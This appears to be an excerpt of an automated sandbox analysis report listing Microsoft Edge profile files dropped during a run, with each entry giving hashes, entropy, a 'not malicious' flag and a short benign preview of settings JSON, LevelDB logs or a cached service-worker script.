                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2cedf.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2faf0.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF32b47.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF387cf.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                Entropy (8bit):5.566953684472815
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:NX2FQaWP8efkr8F1+UoAYDCx9Tuqh0VfUC9xbog/OVHaWQzrwepwtur:NX2FQaWP8efkru1jayHQIZt4
                                                                                                                                                                                                                                                MD5:EB36A55DF7873B903A0EDF748451A0D7
                                                                                                                                                                                                                                                SHA1:8A432A926C5EC1A25EAE9FB0B56461ADF81CB720
                                                                                                                                                                                                                                                SHA-256:1C19BE7282B537361E9CA63051D591F5B548D9F8ED9BD67829F9037976C4BCAD
                                                                                                                                                                                                                                                SHA-512:5F473F89DC3B842CCFAE04FDB3A08C79DDD0795823F059F4C915A770DE8B0C86B13D369EEA06BE27891E0D5A62970FB98475605EE1FFC8704D7A315FF4F78D1D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378838846714906","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378838846714906","location":5,"ma

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2c8a5.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                Entropy (8bit):5.566953684472815
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:NX2FQaWP8efkr8F1+UoAYDCx9Tuqh0VfUC9xbog/OVHaWQzrwepwtur:NX2FQaWP8efkru1jayHQIZt4
                                                                                                                                                                                                                                                MD5:EB36A55DF7873B903A0EDF748451A0D7
                                                                                                                                                                                                                                                SHA1:8A432A926C5EC1A25EAE9FB0B56461ADF81CB720
                                                                                                                                                                                                                                                SHA-256:1C19BE7282B537361E9CA63051D591F5B548D9F8ED9BD67829F9037976C4BCAD
                                                                                                                                                                                                                                                SHA-512:5F473F89DC3B842CCFAE04FDB3A08C79DDD0795823F059F4C915A770DE8B0C86B13D369EEA06BE27891E0D5A62970FB98475605EE1FFC8704D7A315FF4F78D1D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378838846714906","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378838846714906","location":5,"ma

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):228
                                                                                                                                                                                                                                                Entropy (8bit):4.7400908617769035
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkX/8Ct//lFl46JKcZt/FlSFdVVl03nUBcisdty:chXUQI2xH8BzNme/8HILSFd4ddAa1M/
                                                                                                                                                                                                                                                MD5:0232AE7084C463F1F077141AE2F8E4EA
                                                                                                                                                                                                                                                SHA1:4B45C6DE4CE2895BD60C2EFB636D95EA6C9EF7F5
                                                                                                                                                                                                                                                SHA-256:684BB89AC899552393B84CA6F1831E6B2939189427D6585B24BA195F9C89E386
                                                                                                                                                                                                                                                SHA-512:B2DFA94D7B0EB98F28E8DCC4909CCD4E87424470941DB136E3E36A975AAECCFD92AB8F9109544065FBE66DF8AEC0BC24554A0BA39BBEA9D20A17D95242FDE478
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..?..................URES:0..PRES:0.t.g.;................REG:https://ntp.msn.com/.0..REGID_TO_ORIGIN:0..b8...............J4...................PRES:0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):305
                                                                                                                                                                                                                                                Entropy (8bit):5.167438340001241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/kcM1cNwi23oH+TcwtE/a252KLlp/kA4q2PcNwi23oH+TcwtE/a2ZIFUv:7/kc2ZYeb8xLT/kPvLZYeb8J2FUv
                                                                                                                                                                                                                                                MD5:D284A4061CB07658ACF46A2E5C0C912E
                                                                                                                                                                                                                                                SHA1:E40433990D998EE34389EB7A1FA084E88A4459EA
                                                                                                                                                                                                                                                SHA-256:0CA56D8851BA10BF647EDA7A74159CF96FE85A82CE67E0D3725341F6FB8B22D3
                                                                                                                                                                                                                                                SHA-512:B72321AB412B1997AC99DA16F312F5ECF37521ED5520A5D80990E9E8C0056EAF779D4D08876A2FDEFE8C6F3010A306BE7D101071728F30E4B60076E745D08F2A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:45.417 1784 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/16-11:07:45.447 1784 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):85720
                                                                                                                                                                                                                                                Entropy (8bit):5.602675661229336
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/rmL/rBZXECjPXNtSsNFPQoiD:B9LyxPXfOxr1lMe1nL/CL/TXE6tc
                                                                                                                                                                                                                                                MD5:7D87CA230C3C23388CCFCDCBBFAFEC38
                                                                                                                                                                                                                                                SHA1:2F36DA98905A64201FBFEF962356F5FBD58389E1
                                                                                                                                                                                                                                                SHA-256:9FD0AD9ED8AC76483E85585E9E40DD11CB3048F33121B9AB7EE970E0121CC216
                                                                                                                                                                                                                                                SHA-512:A3ED3859F2D89D84931B8F44C1F5C2C0FA503A8AB6BAC07EFF21F1DAB820B3FFF4978D885019539AF1914196ED727AC166F3308F61E22CF93586B624E980B777
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:WDbsFjE3lHq4:WDIqE4
                                                                                                                                                                                                                                                MD5:C55D41554AFCFFE6CB2E81D77DE70607
                                                                                                                                                                                                                                                SHA1:AC4D7F50C1C64A4C8528CB4F1540EFDA39E5A2F6
                                                                                                                                                                                                                                                SHA-256:151FDDB45D3050E474338C1B3430583C244C40034143011BF11EFBDAFA64D2A2
                                                                                                                                                                                                                                                SHA-512:D9BF9411AE4409A2C75F28183EFCB4A6A95E306B55E840130D0026AAD5709F8979CD1661AA87D860A86779314B8869820CD6A307D342B9859F7E2C8DB7915E30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(...Kf.moy retne.........................z%.../.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:WDbsFjE3lHq4:WDIqE4
                                                                                                                                                                                                                                                MD5:C55D41554AFCFFE6CB2E81D77DE70607
                                                                                                                                                                                                                                                SHA1:AC4D7F50C1C64A4C8528CB4F1540EFDA39E5A2F6
                                                                                                                                                                                                                                                SHA-256:151FDDB45D3050E474338C1B3430583C244C40034143011BF11EFBDAFA64D2A2
                                                                                                                                                                                                                                                SHA-512:D9BF9411AE4409A2C75F28183EFCB4A6A95E306B55E840130D0026AAD5709F8979CD1661AA87D860A86779314B8869820CD6A307D342B9859F7E2C8DB7915E30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(...Kf.moy retne.........................z%.../.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF311d3.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:WDbsFjE3lHq4:WDIqE4
                                                                                                                                                                                                                                                MD5:C55D41554AFCFFE6CB2E81D77DE70607
                                                                                                                                                                                                                                                SHA1:AC4D7F50C1C64A4C8528CB4F1540EFDA39E5A2F6
                                                                                                                                                                                                                                                SHA-256:151FDDB45D3050E474338C1B3430583C244C40034143011BF11EFBDAFA64D2A2
                                                                                                                                                                                                                                                SHA-512:D9BF9411AE4409A2C75F28183EFCB4A6A95E306B55E840130D0026AAD5709F8979CD1661AA87D860A86779314B8869820CD6A307D342B9859F7E2C8DB7915E30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(...Kf.moy retne.........................z%.../.

